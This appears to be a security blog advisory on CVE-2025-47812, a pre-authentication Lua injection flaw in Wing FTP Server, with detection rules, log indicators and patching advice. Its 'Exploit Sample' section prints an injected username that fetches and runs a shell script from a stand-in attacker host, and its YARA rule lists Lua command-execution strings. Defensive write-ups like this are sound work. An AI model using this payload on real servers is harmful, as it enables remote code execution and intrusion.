🛠️ Wing FTP Server Under Attack: CVE‑2025‑47812 Exploited via Lua Injection⚠️ Now in CISA KEV Catalog | Patch Deadline: Early AugustBy CyberDudeBivash | Security Research | Malware & Exploit Intel

🔍 Executive Summary

A critical Lua injection vulnerability (CVE‑2025‑47812) in Wing FTP Server is now under active exploitation, allowing unauthenticated attackers to execute arbitrary Lua scripts during authentication. The flaw has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, requiring mandatory patching by August 9, 2025.

⚙️ Technical Overview

📌 Vulnerability: CVE‑2025‑47812

• Type: Remote Code Execution via Lua Injection
• Severity: Critical (CVSS: 9.8)
• Component: Custom Lua scripting engine used in login/authentication logic
• Attack Surface: Pre-authentication — exposed over FTP/HTTP/SFTP interfaces
• Exploit Status: In-the-wild exploitation confirmed
• CISA KEV Inclusion Date: July 29, 2025

🧬 Exploit Mechanics

1. Injection Point: Authentication API (e.g., via POST /admin_login, FTP AUTH, or REST login)
2. Payload: Crafted Lua code injected into username/password fields or HTTP headers
3. Execution Context: Lua interpreter tied to OnUserLogin or custom login handler
4. Outcome:
   • OS-level command execution
   • User database exfiltration
   • FTP root traversal & lateral movement

🔥 Real-World Exploitation Indicators

🧑‍💻 Observed TTPs (Tactics, Techniques, Procedures):

🕵️ Detection Guidance

✳️ YARA Rule (Lua Code Execution Attempt in Wing FTP):

yararule WingFTPLuaExploit
{
    strings:
        $lua1 = "os.execute("
        $lua2 = "io.popen("
        $lua3 = "require('socket')"
    condition:
        any of ($lua*) and filesize < 10KB
}

🧪 Syslog/Log Indicators:

vbnet/log/wftp.log:
[WARN] Lua error in OnUserLogin: attempt to call global 'os'...
[INFO] Unusual script activity from IP: 45.82.XXX.XXX

🛡️ Mitigation & Response

✅ Immediate Actions:

• Patch to latest Wing FTP version (v7.3.9 or newer)
• Disable custom Lua scripting temporarily (if not needed)
• Inspect login scripts and config files (/scripts, /system)

✅ Network Recommendations:

• Block known malicious IPs exploiting this (e.g., via firewall or WAF)
• Monitor for outbound FTP/SFTP exfiltration attempts
• Isolate and inspect any abnormal user login events

🧰 Exploit Sample (Educational Purpose Only)

lua-- Injected in username field
username = "admin'); os.execute('curl http://attacker.com/shell.sh | sh'); --"

🗓️ Deadline Alert from CISA

CISA mandates all federal systems patch CVE‑2025‑47812 before August 9, 2025, under Binding Operational Directive (BOD) 22-01. Organizations should treat this as critical if running Wing FTP in public-facing infrastructure.

🧠 Expert Note from CyberDudeBivash

“Lua-based customization makes Wing FTP flexible but exploitable. Always sandbox dynamic scripting, especially in auth paths. This is a classic case of feature becoming an exploit vector when input isn’t sanitized.”